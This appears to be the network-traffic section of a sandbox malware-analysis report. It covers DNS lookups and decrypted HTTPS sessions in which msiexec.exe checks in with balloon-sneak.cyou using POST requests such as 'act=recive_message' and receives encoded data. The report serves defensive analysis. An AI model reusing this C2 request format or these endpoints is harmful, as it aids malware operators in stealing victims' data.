                                                                                                                                                                                                          Nov 29, 2024 15:46:16.481467009 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:16.481544018 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:16.498107910 CET49771443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:16.498116970 CET44349771172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.292787075 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.292804003 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.292865992 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.293242931 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:17.293252945 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.572103024 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.572182894 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.578080893 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.578088045 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.578288078 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.579644918 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.580816984 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.580848932 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.580959082 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.580981016 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.584676027 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.584712982 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.588768959 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.588788986 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589505911 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589534998 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589694023 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589728117 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589737892 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589741945 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589865923 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589886904 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.589932919 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.591120005 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.591149092 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.635332108 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.635463953 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:18.635493994 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170373917 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170460939 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170567989 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170738935 CET49783443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.170754910 CET44349783172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255342960 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255378008 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255444050 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255834103 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:23.255847931 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:24.527304888 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:24.527434111 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:24.528688908 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:24.528703928 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:24.528955936 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:24.530567884 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:24.530586958 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:24.530636072 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.314353943 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.314428091 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.314479113 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.367408991 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.367425919 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.367438078 CET49795443192.168.2.4172.67.170.85
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.367444038 CET44349795172.67.170.85192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.709969997 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.710021019 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.710100889 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.710479975 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.710514069 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.110686064 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.110775948 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.112288952 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.112298012 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.112531900 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.113749981 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.159332991 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.683913946 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684000015 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684048891 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684046984 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684073925 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684109926 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684118032 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684154987 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684194088 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684196949 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684207916 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684252024 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684259892 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684314013 CET44349806104.26.2.16192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684360027 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684648991 CET49806443192.168.2.4104.26.2.16
                                                                                                                                                                                                          Nov 29, 2024 15:46:29.684662104 CET44349806104.26.2.16192.168.2.4

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.332392931 CET5969853192.168.2.41.1.1.1
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.835932970 CET53596981.1.1.1192.168.2.4
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.389969110 CET6423253192.168.2.41.1.1.1
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.709086895 CET53642321.1.1.1192.168.2.4

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.332392931 CET192.168.2.41.1.1.10x73c1Standard query (0)balloon-sneak.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.389969110 CET192.168.2.41.1.1.10xd500Standard query (0)rentry.coA (IP address)IN (0x0001)false

                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.835932970 CET1.1.1.1192.168.2.40x73c1No error (0)balloon-sneak.cyou172.67.170.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 29, 2024 15:45:49.835932970 CET1.1.1.1192.168.2.40x73c1No error (0)balloon-sneak.cyou104.21.55.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.709086895 CET1.1.1.1192.168.2.40xd500No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.709086895 CET1.1.1.1192.168.2.40xd500No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 29, 2024 15:46:27.709086895 CET1.1.1.1192.168.2.40xd500No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • balloon-sneak.cyou
                                                                                                                                                                                                          • rentry.co

                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.449736172.67.170.854435544C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-29 14:45:51 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                          Host: balloon-sneak.cyou
                                                                                                                                                                                                          2024-11-29 14:45:51 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                          2024-11-29 14:45:54 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 14:45:53 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=1mo8vv0uuj7p82i02pdde67b6j; expires=Tue, 25-Mar-2025 08:32:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=alfmOCkO9Lov5150ekWXUBzGwDlPPDH8up82tnNE18%2B3kXYauGyoF5uBqSjiFIR4hStvWbR40Kj2onPXMVlF8jaJ2mSvmHMnN4xkNfbAX3yYu4qZBr%2B%2BhKGhd7R9QwJ89fwxQ90%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8ea362445d4d433e-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1568&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1771844&cwnd=248&unsent_bytes=0&cid=fcd6d2c071b06a2d&ts=2973&x=0"
                                                                                                                                                                                                          2024-11-29 14:45:54 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                          2024-11-29 14:45:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.449737172.67.170.854435544C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-29 14:45:55 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 49
                                                                                                                                                                                                          Host: balloon-sneak.cyou
                                                                                                                                                                                                          2024-11-29 14:45:55 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 37 26 6a 3d
                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl8vs07&j=
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 14:45:58 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3jrvn29qaj020u52jr30h5khhs; expires=Tue, 25-Mar-2025 08:32:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZkmwjSylZK6WNdiVg4f5A4qFW%2F37nFCO0MO316n8VEdptAsp2942MseiVkesfXsXfd%2Fp%2FjtAx9m1CArASyvrMX8Dy63%2FbndwVPlsD2YquRvisEX8H99BSOwbiSCavxwaEZeiik%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8ea3625faf738cb9-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=21596&min_rtt=2584&rtt_var=12455&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=951&delivery_rate=1130030&cwnd=183&unsent_bytes=0&cid=ab95039badd2f11f&ts=3055&x=0"
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC346INData Raw: 34 65 33 0d 0a 52 6f 62 38 2f 62 74 4f 77 39 43 47 64 56 69 4c 75 65 32 41 41 58 51 69 47 72 69 70 33 6f 2b 75 2f 76 4a 44 4f 75 4b 44 4c 41 41 39 70 49 72 66 67 58 72 76 38 76 55 51 65 72 48 4e 6e 2f 56 6b 57 41 42 37 33 49 76 6b 36 63 2b 53 67 53 59 57 77 50 56 42 49 6e 7a 67 6e 5a 48 49 4b 2b 2f 79 34 77 31 36 73 65 4b 57 6f 6d 51 61 41 43 43 61 7a 4c 54 74 7a 35 4b 51 49 6c 47 4e 38 30 42 6a 4c 75 71 62 6c 64 34 74 70 37 48 71 47 44 33 75 33 49 7a 71 62 78 31 50 63 74 57 4c 38 71 33 4c 68 4e 42 35 47 4b 2f 6d 57 47 45 4c 35 34 2b 57 6d 54 50 76 71 36 51 51 4e 71 6d 44 7a 2b 46 6b 46 6b 35 38 33 4d 4b 32 35 38 61 61 6b 53 64 51 6b 75 70 4b 61 43 37 6b 6d 4a 54 55 4a 4c 4f 38 34 42 38 32 36 4e 61 4d 6f 69 31 57 52 32 43 61 6b 2f 79 2b 2f 70 2b 42 4d 45
                                                                                                                                                                                                          Data Ascii: 4e3Rob8/btOw9CGdViLue2AAXQiGrip3o+u/vJDOuKDLAA9pIrfgXrv8vUQerHNn/VkWAB73Ivk6c+SgSYWwPVBInzgnZHIK+/y4w16seKWomQaACCazLTtz5KQIlGN80BjLuqbld4tp7HqGD3u3Izqbx1PctWL8q3LhNB5GK/mWGEL54+WmTPvq6QQNqmDz+FkFk583MK258aakSdQkupKaC7kmJTUJLO84B826NaMoi1WR2Cak/y+/p+BME
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC912INData Raw: 6e 79 6b 6d 4a 48 59 49 61 47 67 37 42 77 78 37 4d 6d 45 36 32 34 62 51 48 58 51 78 4c 2f 74 79 35 61 61 4c 6c 4b 45 37 45 4e 6b 4a 4f 54 65 30 5a 6b 72 75 66 4b 38 56 78 6e 73 79 34 6a 75 64 56 52 36 4f 4d 57 46 70 61 33 4c 6b 4e 42 35 47 49 6a 6b 54 57 45 76 36 35 32 58 30 6a 36 68 6f 4f 49 61 50 2f 76 64 69 75 78 70 46 56 4a 79 31 4d 32 2f 35 4d 65 56 6c 53 5a 63 77 4b 38 4f 5a 54 79 6b 78 74 2f 34 49 61 71 2b 37 67 41 36 71 63 54 42 2b 79 4d 52 54 44 69 43 69 37 6a 73 79 4a 32 55 4c 31 61 45 37 55 68 73 4b 65 75 59 6c 64 6b 72 71 37 72 73 46 6a 66 69 31 49 2f 6e 62 68 4a 47 64 4e 76 4f 2f 4b 4f 4d 6d 34 68 68 41 4d 44 50 53 57 45 32 70 71 75 63 31 79 4b 6d 70 4b 51 49 64 50 43 62 69 4f 34 6a 54 67 42 32 33 38 53 75 37 4e 36 5a 6e 6a 4e 55 68 65 64 44
                                                                                                                                                                                                          Data Ascii: nykmJHYIaGg7Bwx7MmE624bQHXQxL/ty5aaLlKE7ENkJOTe0ZkrufK8Vxnsy4judVR6OMWFpa3LkNB5GIjkTWEv652X0j6hoOIaP/vdiuxpFVJy1M2/5MeVlSZcwK8OZTykxt/4Iaq+7gA6qcTB+yMRTDiCi7jsyJ2UL1aE7UhsKeuYldkrq7rsFjfi1I/nbhJGdNvO/KOMm4hhAMDPSWE2pquc1yKmpKQIdPCbiO4jTgB238Su7N6ZnjNUhedD
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 33 39 66 30 0d 0a 6f 34 39 65 42 38 47 34 63 52 58 62 57 7a 72 50 74 7a 5a 32 65 4b 31 50 41 72 77 35 6c 50 4b 54 47 33 2f 59 68 73 61 44 75 48 43 75 72 37 6f 7a 73 62 52 46 57 4f 4d 57 46 70 61 33 4c 6b 4e 42 35 47 49 76 6e 51 6d 34 6b 34 6f 79 52 31 6a 36 72 6f 4f 41 5a 50 75 58 56 68 75 39 73 45 31 4a 38 32 74 6d 39 36 4d 75 53 6e 54 4e 64 77 4b 38 4f 5a 54 79 6b 78 74 2f 6a 47 4b 61 69 39 52 42 34 33 4e 69 42 37 47 51 41 41 47 65 55 30 76 7a 71 77 4e 7a 49 59 56 75 4d 37 45 64 6e 4b 2f 61 55 6b 39 67 2b 70 72 76 74 48 54 76 6e 31 49 54 75 5a 67 52 4c 64 39 4c 45 76 65 44 42 6c 35 51 68 47 4d 36 68 53 58 70 6b 76 4e 36 2b 31 43 4f 7a 73 66 56 56 44 2b 72 56 67 65 56 31 56 6c 38 32 77 34 75 37 34 59 7a 45 30 43 42 55 6a 4f 42 42 5a 43 37 73 6e 5a 37 4c
                                                                                                                                                                                                          Data Ascii: 39f0o49eB8G4cRXbWzrPtzZ2eK1PArw5lPKTG3/YhsaDuHCur7ozsbRFWOMWFpa3LkNB5GIvnQm4k4oyR1j6roOAZPuXVhu9sE1J82tm96MuSnTNdwK8OZTykxt/jGKai9RB43NiB7GQAAGeU0vzqwNzIYVuM7EdnK/aUk9g+prvtHTvn1ITuZgRLd9LEveDBl5QhGM6hSXpkvN6+1COzsfVVD+rVgeV1Vl82w4u74YzE0CBUjOBBZC7snZ7L
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 6b 63 4e 4f 66 53 67 2b 70 76 45 56 4a 31 33 38 4f 32 35 4d 6d 51 6e 53 4a 4b 67 2b 41 4f 4c 47 54 6a 68 74 2b 42 62 49 61 42 30 7a 52 36 39 70 57 57 6f 6d 51 61 41 43 43 61 79 72 54 71 77 70 69 43 4c 30 71 4f 35 6b 35 6b 4c 4f 79 5a 6b 39 63 69 73 37 72 6c 46 7a 54 6d 30 34 62 6d 59 68 4a 45 64 4e 32 4c 38 71 33 4c 68 4e 42 35 47 4b 6a 69 56 48 68 6d 79 70 57 66 33 6a 79 33 71 61 51 49 64 50 43 62 69 4f 34 6a 54 67 42 38 30 63 47 31 37 73 57 59 6e 53 46 52 6a 2b 68 47 62 79 7a 32 6e 35 58 4c 4b 4b 53 7a 36 78 30 2b 34 64 65 41 37 6d 63 45 53 7a 69 55 69 37 76 31 6a 4d 54 51 41 56 4f 57 77 6c 78 77 5a 50 76 51 68 70 6b 72 72 66 4b 38 56 7a 50 6c 32 6f 37 6f 5a 52 31 46 64 64 72 4f 74 75 72 41 6e 4a 41 69 58 6f 62 73 52 6d 6f 6f 36 4a 32 53 33 43 69 7a 6f
                                                                                                                                                                                                          Data Ascii: kcNOfSg+pvEVJ138O25MmQnSJKg+AOLGTjht+BbIaB0zR69pWWomQaACCayrTqwpiCL0qO5k5kLOyZk9cis7rlFzTm04bmYhJEdN2L8q3LhNB5GKjiVHhmypWf3jy3qaQIdPCbiO4jTgB80cG17sWYnSFRj+hGbyz2n5XLKKSz6x0+4deA7mcESziUi7v1jMTQAVOWwlxwZPvQhpkrrfK8VzPl2o7oZR1FddrOturAnJAiXobsRmoo6J2S3Cizo
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 76 31 34 4b 69 4c 56 5a 48 59 4a 71 54 2f 4d 72 57 6b 5a 59 32 53 62 58 6d 54 6a 4e 6b 2b 39 43 47 6d 53 75 74 38 72 78 58 4e 2b 58 52 67 75 64 6e 48 6b 64 37 32 38 65 34 34 4d 47 59 6d 53 56 64 6b 76 4e 49 62 43 54 72 6b 4a 44 56 50 71 2b 33 35 42 74 36 70 35 75 49 2b 69 4e 4f 41 45 6e 4e 79 2f 7a 79 67 6f 58 51 4a 6c 54 41 75 51 35 74 4b 66 61 53 6b 4e 6b 74 6f 72 62 76 45 44 7a 76 32 6f 7a 6e 59 42 4e 47 65 64 72 48 74 75 72 45 6c 70 34 73 58 6f 54 6e 53 43 4a 71 70 4a 6d 48 6d 58 54 68 67 4f 6b 5a 4d 2b 72 64 67 76 52 4c 4a 77 42 6e 6c 4e 4c 38 36 73 44 63 79 47 46 63 69 2b 6c 43 5a 79 7a 68 6e 35 66 54 4a 4b 36 39 39 68 59 31 34 4e 79 45 37 32 77 59 52 58 62 49 7a 4c 66 6d 78 4a 57 65 4a 78 6a 4f 6f 55 6c 36 5a 4c 7a 65 71 64 6f 69 71 71 50 72 46 44
                                                                                                                                                                                                          Data Ascii: v14KiLVZHYJqT/MrWkZY2SbXmTjNk+9CGmSut8rxXN+XRgudnHkd728e44MGYmSVdkvNIbCTrkJDVPq+35Bt6p5uI+iNOAEnNy/zygoXQJlTAuQ5tKfaSkNktorbvEDzv2oznYBNGedrHturElp4sXoTnSCJqpJmHmXThgOkZM+rdgvRLJwBnlNL86sDcyGFci+lCZyzhn5fTJK699hY14NyE72wYRXbIzLfmxJWeJxjOoUl6ZLzeqdoiqqPrFD
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 6f 69 31 57 52 32 43 61 6b 2f 7a 63 32 70 75 58 4c 68 71 70 35 6c 56 6a 4c 75 65 56 6b 35 6b 7a 37 36 75 6b 45 44 61 70 67 38 2f 76 62 78 74 45 61 74 62 4c 76 4f 54 4c 6c 6f 49 75 56 34 33 69 54 6d 63 32 35 59 79 51 30 69 6d 69 74 75 73 59 4e 75 48 52 7a 36 77 6a 45 56 67 34 67 6f 75 51 37 74 32 57 30 67 5a 43 6c 75 5a 43 63 79 2f 70 6b 74 2f 47 59 72 6a 79 34 78 74 36 73 5a 75 50 34 32 34 45 52 58 6e 51 77 62 48 6c 77 35 6d 56 4c 6c 79 45 36 6b 42 77 4b 75 75 65 6d 64 49 74 70 4c 48 76 48 54 54 67 79 63 2b 73 49 78 46 59 4f 49 4b 4c 6c 76 62 4e 6b 5a 78 6a 64 6f 76 33 53 53 41 46 36 70 57 59 31 54 72 68 72 61 6f 4f 65 75 37 58 7a 37 6f 6a 48 30 35 30 32 63 79 30 35 63 6d 63 6d 79 46 58 69 75 39 4a 63 43 37 6f 6c 49 33 57 4c 36 79 32 36 52 30 2f 34 4d 6d
                                                                                                                                                                                                          Data Ascii: oi1WR2Cak/zc2puXLhqp5lVjLueVk5kz76ukEDapg8/vbxtEatbLvOTLloIuV43iTmc25YyQ0imitusYNuHRz6wjEVg4gouQ7t2W0gZCluZCcy/pkt/GYrjy4xt6sZuP424ERXnQwbHlw5mVLlyE6kBwKuuemdItpLHvHTTgyc+sIxFYOIKLlvbNkZxjdov3SSAF6pWY1TrhraoOeu7Xz7ojH0502cy05cmcmyFXiu9JcC7olI3WL6y26R0/4Mm
                                                                                                                                                                                                          2024-11-29 14:45:58 UTC1369INData Raw: 67 42 34 33 73 65 2f 36 73 4b 54 6e 53 35 66 69 2b 35 45 62 44 62 72 6d 35 66 56 4a 4b 79 67 37 68 30 6f 34 4e 4b 43 37 47 73 45 51 7a 69 55 69 37 76 31 6a 4d 54 51 45 31 4b 44 37 56 68 76 4b 36 53 42 30 63 42 73 70 72 36 6b 54 33 72 37 79 59 2f 70 59 78 46 4f 61 74 76 44 73 2b 66 4d 6d 70 73 72 57 34 6e 6c 51 47 73 69 35 5a 4f 65 32 43 79 6b 73 75 30 46 4e 36 6d 56 7a 2b 56 37 56 68 67 34 37 63 65 33 33 4d 2b 4b 30 44 34 57 6d 61 46 4a 62 6d 53 38 33 70 37 4c 49 61 6d 32 35 42 6f 38 34 74 71 4f 34 57 4d 57 51 33 6a 66 77 4c 50 72 79 35 47 61 4b 46 47 53 36 55 70 77 4a 4f 69 61 33 35 64 73 70 71 71 6b 54 33 72 5a 32 49 54 75 59 78 74 56 4f 4d 57 46 70 61 33 4c 6b 4e 42 35 47 49 6a 71 52 57 51 76 35 35 32 52 30 69 61 75 76 65 34 52 50 4f 48 65 6a 2b 35 6a
